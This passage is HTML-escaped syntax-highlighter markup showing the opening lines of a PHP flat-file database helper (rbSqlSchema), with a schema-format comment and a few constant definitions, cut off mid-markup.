!important;&quot;&gt;175&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-176&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;176&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-177&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;177&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-178&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;178&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-179&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;179&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-180&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;180&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-181&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;181&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-182&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;182&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-183&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;183&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-184&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;184&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-185&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;185&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-186&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;186&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-187&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;187&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a7b199319094-188&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;188&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 715.2px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-ta&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(255, 0, 0) !important;&quot;&gt;&amp;lt;?php&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;/*&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;Table[&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;&amp;nbsp;&amp;nbsp;tablename, filepath&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;&amp;nbsp;&amp;nbsp;[column],&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;&amp;nbsp;&amp;nbsp;[row],&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;&amp;nbsp;&amp;nbsp;[row],&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;&amp;nbsp;&amp;nbsp;...&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;rbSqlSchema[&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;&amp;nbsp;&amp;nbsp;rbSqlSchema,/rbSqlSchema,&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;&amp;nbsp;&amp;nbsp;[&quot;tableName&quot;,&quot;filePath&quot;],&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-12&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;&amp;nbsp;&amp;nbsp;[&quot;something&quot;,&quot;/rbSql_&quot;.substr(md5(rand(10000000,100000000)),0,16)]&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-13&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;]&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-14&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-c&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(153, 153, 153) !important; font-style: italic !important;&quot;&gt;*/&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-15&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-16&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;define&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;STR&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;chr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-17&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;define&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;ARR&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;chr&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-18&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;define&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;SCHEMA&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;../../rbSql/rbSqlSchema&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;true&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-19&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-20&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit 